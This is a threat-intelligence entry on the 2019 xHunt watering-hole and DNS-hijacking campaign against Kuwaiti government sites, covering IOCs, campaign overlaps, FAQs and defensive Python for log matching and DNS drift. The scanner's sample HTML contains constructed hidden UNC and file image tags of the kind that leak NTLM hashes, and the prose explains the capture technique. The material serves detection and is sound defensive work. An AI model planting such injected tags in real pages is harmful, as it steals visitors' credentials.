Threats Feed | Unknown | Last Updated 06/03/2026 | Author: Certfa Radar | Publish Date: 27/01/2020

Shades of OilRig and Chafer in xHunt Campaign's Attack on Kuwaiti Government Sector

  • Actor Motivations: Espionage, Exfiltration
  • Attack Vectors: Code injection, Compromised Credentials, DNS spoofing
  • Attack Complexity: Medium
  • Threat Risk: High Impact/High Probability

Threat Overview

The xHunt campaign targeted government organizations in Kuwait, compromising a legitimate government website to turn it into a watering hole. Between May and December 2019, the threat actors injected HTML code into the site to harvest NTLM credentials (NetNTLM challenge-response hashes) from visiting Windows clients; once cracked, those credentials could let the actors enter organizations undetected, steal sensitive information, and plant backdoors for future access. DNS redirect activity against Kuwaiti organizations' domains was observed over the same period, which also points to an interest in harvesting user credentials. The credential-capture server ran the Responder tool, and the activity was linked with previous xHunt operations, including the Hisoka campaign. Some of the infrastructure used in the attack also overlaps with infrastructure previously tied to the known threat groups OilRig and Chafer.

Detected Targets

Type | Description | Confidence
Sector: Government Agencies and Services | The sector targeted by the attack included a Kuwait government organization. | Verified
Region: Kuwait | The country targeted by the attack was Kuwait. | Verified

Extracted IOCs

  • 6google[.]com
  • alforatsystem[.]com
  • antivirus-update[.]top
  • cloudipnameserver[.]com
  • ffconnectivitycheck[.]com
  • firewallsupports[.]com
  • googie[.]email
  • google-update[.]com
  • lowconnectivity[.]com
  • microsofte-update[.]com
  • sakabota[.]com
  • zombsroyale[.]io
  • 104[.]168.136.161
  • 104[.]168.244.213
  • 185[.]15.247.140
  • 185[.]161.209.147
  • 185[.]161.211.72
  • 185[.]161.211.73
  • 185[.]161.211.74
  • 185[.]161.211.75
  • 185[.]161.211.76
  • 185[.]161.211.77
  • 185[.]161.211.78
  • 185[.]161.211.79
  • 185[.]161.211.86
  • 185[.]174.101.66
  • 185[.]174.101.68
  • 192[.]99.138.4
  • 192[.]99.138.6
  • 199[.]247.3.186
  • 199[.]247.3.187
  • 199[.]247.3.188
  • 199[.]247.3.189
  • 199[.]247.3.190
  • 199[.]247.3.191
  • 199[.]247.3.192
  • 199[.]247.3.193
  • 199[.]247.3.194
  • 199[.]247.3.195
  • 199[.]247.3.196
  • 199[.]247.3.197
  • 199[.]247.3.198
  • 213[.]202.217.0
  • 213[.]202.217.1
  • 213[.]202.217.10
  • 213[.]202.217.11
  • 213[.]202.217.12
  • 213[.]202.217.13
  • 213[.]202.217.14
  • 213[.]202.217.15
  • 213[.]202.217.16
  • 213[.]202.217.17
  • 213[.]202.217.18
  • 213[.]202.217.19
  • 213[.]202.217.2
  • 213[.]202.217.20
  • 213[.]202.217.21
  • 213[.]202.217.22
  • 213[.]202.217.3
  • 213[.]202.217.31
  • 213[.]202.217.4
  • 213[.]202.217.5
  • 213[.]202.217.6
  • 213[.]202.217.7
  • 213[.]202.217.8
  • 213[.]202.217.9
  • 91[.]132.139.183
  • 91[.]132.139.200

Tip: 68 related IOCs (56 IP, 12 domain, 0 URL, 0 email, 0 file hash) to this threat have been found.
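To put the list above to use, here is an added example (not code from Certfa Radar or from the Unit 42 report) that refangs a subset of the page's indicators and matches them against a few DNS and proxy log lines. The log lines, the client addresses and the kuwait-example.gov.kw names are constructed for the example; only the indicators themselves come from the list above.

```python
"""Refang defanged IOCs and match them against DNS/proxy log lines.

Added example, not part of the Certfa Radar page or the Unit 42 report.
The log lines below are constructed; only the indicators are from the page.
"""
import ipaddress
import re

# Constructed subset of the page's IOC list, kept in its defanged form.
DEFANGED_IOCS = """
6google[.]com
sakabota[.]com
cloudipnameserver[.]com
104[.]168.244.213
185[.]161.211.72
213[.]202.217.9
"""

# Constructed sample log lines (DNS answers and proxy requests).
# Client IPs and the kuwait-example.gov.kw names are invented.
SAMPLE_LOGS = """
1579000001.123 10.0.5.17 dns query sakabota.com A 104.168.244.213
1579000002.456 10.0.5.18 dns query www.kuwait-example.gov.kw A 10.0.0.9
1579000003.789 10.0.5.19 GET http://6google.com/favicon.ico 200
1579000004.000 10.0.5.20 dns query mail.kuwait-example.gov.kw MX 185.161.211.72
1579000005.000 10.0.5.21 GET http://download.windowsupdate.com/x 200
"""

def refang(ioc: str) -> str:
    """Turn 'example[.]com' / '1[.]2.3.4' / 'hxxp://' into usable strings."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")

def load_iocs(text: str):
    """Split a defanged, whitespace-separated list into IP and domain sets."""
    ips, domains = set(), set()
    for token in text.split():
        value = refang(token.strip().lstrip("•").strip())  # tolerate bullets
        if not value:
            continue
        try:
            ips.add(str(ipaddress.ip_address(value)))
        except ValueError:
            domains.add(value.lower())
    return ips, domains

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.IGNORECASE)

def match_logs(logs: str, ips, domains):
    """Return (line_number, indicator) for every log line touching an IOC.

    Domain matching also flags subdomains of a listed domain, so that
    e.g. 'cdn.sakabota.com' is caught, not only the apex name.
    """
    hits = []
    lines = [line for line in logs.splitlines() if line.strip()]
    for number, line in enumerate(lines, start=1):
        for ip in IP_RE.findall(line):
            if ip in ips:
                hits.append((number, ip))
        for host in HOST_RE.findall(line):
            host_l = host.lower()
            for dom in domains:
                if host_l == dom or host_l.endswith("." + dom):
                    hits.append((number, dom))
                    break
    return hits

if __name__ == "__main__":
    ips, domains = load_iocs(DEFANGED_IOCS)
    for number, indicator in match_logs(SAMPLE_LOGS, ips, domains):
        print(f"line {number}: matched {indicator}")
```

Feeding the full list at the top of this section into load_iocs works the same way; the regex-based matching is deliberately format-agnostic so the same function can be pointed at Zeek dns.log, proxy access logs or mail server logs without a parser per source.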

Overlaps

Actor: Unknown | CASHY200 Backdoor Targets Kuwait via DNS Tunneling and Spearphishing

Source: Palo Alto Networks - October 2019

Detection (one case): firewallsupports[.]com

Actor: Unknown | xHunt Campaign Targets Kuwait's Transportation and Shipping Sectors

Source: Palo Alto Networks - September 2019

Detection (10 cases): 185[.]15.247.140, 213[.]202.217.4, 213[.]202.217.9, 91[.]132.139.183, 6google[.]com, alforatsystem[.]com, firewallsupports[.]com, googie[.]email, google-update[.]com, sakabota[.]com

Actor: APT34 | Cyber-Espionage in the Middle East: A Deep Dive into APT34's Operations

Source: Cyware - August 2019

Detection (three cases): 185[.]15.247.140, 185[.]161.211.86, 213[.]202.217.9

Actor: Unknown | Widespread DNS Hijacking Campaign with Possible Iranian Nexus Targets Multiple Sectors

Source: CrowdStrike - January 2019

Detection (four cases): 185[.]15.247.140, 185[.]161.209.147, 199[.]247.3.191, cloudipnameserver[.]com

Actor: Unknown | DNSPIONAGE: Unpacking Advanced Spear Phishing and Lateral Movement Techniques

Source: Openminded - January 2019

Detection (two cases): 185[.]161.211.72, 185[.]161.211.79

Actor: Unknown | DNSpionage Campaign Targets Lebanon and UAE Government Domains

Source: Cisco Talos - November 2018

Detection (one case): 185[.]161.211.72

Hint: Overlaps are extracted automatically by examining the IOCs associated with all indexed threats and actors.

FAQs

xHunt Campaign and Kuwait Watering Hole Attacks

Attackers compromised a legitimate Kuwait government website and inserted hidden code designed to silently collect the Windows network credentials (NTLM hashes) of anyone who visited the page. During the same timeframe, the attackers also tampered with the DNS records of several organizations' domains to redirect legitimate web and mail traffic to servers they controlled.

The attack is attributed to the operators of the "xHunt" campaign, specifically using tools and servers associated with their "Hisoka" and "Sakabota" operations. Some of the network infrastructure used in these attacks also shares historical connections with other known cyber threat groups, such as OilRig and Chafer.

The primary goal was to harvest user credentials, specifically account names and NTLM challenge-response hashes rather than plaintext passwords. By capturing this data, the attackers aimed to crack the hashes offline to recover passwords, then use the recovered credentials to breach organizations, steal sensitive information, and establish long-term access without being detected.

These specific attacks were highly targeted at government and private sector organizations in Kuwait. The attackers also focused heavily on capturing login credentials for organizational email servers.

The attackers injected an invisible image into a trusted website, with the image source pointing at a server they controlled. When a user visited the site, the browser tried to fetch the image, and a Windows client answering that server's authentication challenge automatically sent the user's network login credentials (an NTLM hash) to the attacker-controlled server, where the Responder tool captured them. Additionally, they altered DNS records (the internet's address book) to reroute organizational web and email traffic to deceptive servers.

Government and major private sector organizations hold highly sensitive communications, intellectual property, and citizen data. Gaining trusted access through stolen employee credentials allows attackers to navigate these valuable networks freely and spy on internal operations.

Organizations should block outbound SMB (TCP port 445) and automatic NTLM authentication from internal hosts to the public internet at the perimeter, which stops this specific type of credential theft. It is also crucial to continuously monitor website code for unauthorized changes, and to watch for unexpected changes in the DNS records of the organization's web and mail domains.
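One way to implement the two monitoring checks just described, as an added example that is not code from Certfa Radar or Unit 42: the first part scans a page for injected resource references that would make a Windows client authenticate to an outside host (a UNC or file:// path, which the SMB client resolves with NTLM, or a hidden image or frame on a host outside the site's allowlist, which a server running a tool such as Responder can answer with an NTLM challenge), and the second part compares the DNS answers for an organization's web and mail names against the records it expects. The HTML fragment, the allowlist, the expected records and the resolver answers are all constructed for the example; only 185.161.211.72 is taken from the IOC list above.

```python
"""Watering-hole injection scan and DNS drift check.

Added example, not code from Certfa Radar or the Unit 42 report. The HTML,
the allowlist, the expected DNS records and the resolver answers are all
constructed; 185.161.211.72 is the one value taken from the page's IOC list.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed page fragment: one legitimate image, then injected hidden
# references of the kind that trigger NTLM authentication to a remote host.
SAMPLE_HTML = """
<html><body>
<img src="/static/logo.png" alt="logo">
<p>Ministry news</p>
<img src="\\\\203.0.113.45\\share\\pixel.png" width="1" height="1" style="display:none">
<img src="file://203.0.113.45/x.png" style="visibility:hidden">
<iframe src="http://203.0.113.46/track" height="0" width="0"></iframe>
</body></html>
"""

# Hosts the site may load resources from (assumption for the example).
ALLOWED_HOSTS = {"www.example.gov.kw", "cdn.example.gov.kw"}

def _external_host(src: str):
    """Return the remote host a resource reference points at, or None if local."""
    if src.startswith("\\\\"):  # UNC path \\host\share\file -> SMB, NTLM auth
        return src.strip("\\").split("\\")[0]
    parsed = urlparse(src)
    if parsed.scheme == "file":
        return parsed.netloc or None  # file://host/... also goes over SMB
    if parsed.scheme in ("http", "https"):
        return parsed.hostname
    return None  # relative path or unknown scheme: served by the site itself

def _hidden(attrs: dict) -> bool:
    """True for 0/1-pixel or CSS-hidden elements, the watering-hole pattern."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    tiny = attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
    return tiny or "display:none" in style or "visibility:hidden" in style

class InjectionScanner(HTMLParser):
    """Collects resource-loading tags that point off-site."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("img", "iframe", "script", "link"):
            return
        attrs = dict(attrs)
        src = attrs.get("src") or attrs.get("href") or ""
        host = _external_host(src)
        if host is None or host in ALLOWED_HOSTS:
            return
        unc = src.startswith("\\\\") or src.startswith("file:")
        reason = "unc_or_file" if unc else "external"
        if _hidden(attrs):
            reason += ",hidden"
        self.findings.append((tag, host, reason))

def scan_html(html: str):
    """Return (tag, host, reason) for each suspicious off-site reference."""
    scanner = InjectionScanner()
    scanner.feed(html)
    return scanner.findings

# Part 2: DNS drift. Expected records and observed answers are constructed.
EXPECTED = {
    "www.example.gov.kw": {"198.51.100.10"},
    "mail.example.gov.kw": {"198.51.100.25"},
}
OBSERVED = {  # what a resolver returned in this constructed run
    "www.example.gov.kw": {"198.51.100.10"},
    "mail.example.gov.kw": {"185.161.211.72"},  # IP from the IOC list above
}

def dns_drift(expected, observed):
    """Return {name: (expected_sorted, observed_sorted)} for names that changed."""
    return {name: (sorted(expected[name]), sorted(observed.get(name, set())))
            for name in expected if observed.get(name, set()) != expected[name]}

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML):
        print("suspicious tag:", finding)
    for name, (want, got) in dns_drift(EXPECTED, OBSERVED).items():
        print(f"DNS drift for {name}: expected {want}, got {got}")
```

In production the HTML would come from a scheduled fetch of the organization's own pages and OBSERVED from real resolver queries (ideally from more than one vantage point, since hijacked records are sometimes served only to some resolvers); any hit from either check is worth treating as an incident rather than a tuning problem.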

This is a highly targeted issue. The specific watering hole and internet routing attacks detailed in this report were aimed directly at government and private organizations in Kuwait, rather than the general public.